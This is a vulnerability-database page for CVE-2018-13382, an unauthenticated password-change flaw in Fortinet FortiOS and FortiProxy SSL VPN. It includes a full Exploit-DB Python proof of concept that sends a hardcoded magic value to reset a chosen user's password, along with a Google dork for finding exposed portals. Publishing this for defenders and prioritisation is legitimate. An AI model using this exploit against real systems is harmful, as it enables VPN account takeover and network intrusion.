CVE-2018-13382

unknown KEV

Published 2022-01-10 · Modified 2022-01-10

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

2.5

Description

An Improper Authorization vulnerability in Fortinet FortiOS and FortiProxy under SSL VPN web portal allows an unauthenticated attacker to modify the password.

CISA KEV

Vendor: Fortinet
Product: FortiOS and FortiProxy
Due date: 2022-07-10

Predictions

Exploit likelihood

99%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-49074 webapps hardware python · 2 KB

Ricardo Longatto · 2020-11-19

Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification

python exploit Source: Exploit-DB

# Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
# Google Dork: intitle:"Please Login" "Use FTM Push"
# Date: 15/11/2020
# Exploit Author: Ricardo Longatto
# Details: This exploit allow change users password from SSLVPN web portal
# Vendor Homepage: https://www.fortinet.com/
# Version: Exploit to Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10.
# Tested on: 6.0.4
# NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-13382
# CVE : CVE-2018-13382
# Credits: Vulnerability by Meh Chang and Orange Tsai.

#!/usr/bin/env python

import requests, urllib3, sys, re, argparse
urllib3.disable_warnings()

menu = argparse.ArgumentParser(description = "[+] Exploit FortiOS Magic backdoor - CVE-2018-13382 [+]")
menu.add_argument('-t', metavar='Target/Host IP', required=True)
menu.add_argument('-p', metavar='Port', required=True)
menu.add_argument('-u', metavar='User', required=True)
menu.add_argument('--setpass', metavar='SetNewPass', default='h4ck3d', help='set the password for user, if you not set, the default password will be set to h4ck3d')
op = menu.parse_args()

host = op.t
port = op.p
user = op.u
setpass = op.setpass

url = "https://"+host+":"+port+"/remote/logincheck"
exploit = {'ajax':'1','username':user,'magic':'4tinet2095866','credential':setpass}
r = requests.post(url, verify=False, data = exploit)

if re.search("/remote/hostcheck_install",r.text):
    print "[+] - The new password to ["+user+"] is "+setpass+" <<<< [+]"
else:
    print "Exploit Failed. :/"

References

https://nvd.nist.gov/vuln/detail/CVE-2018-13382

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.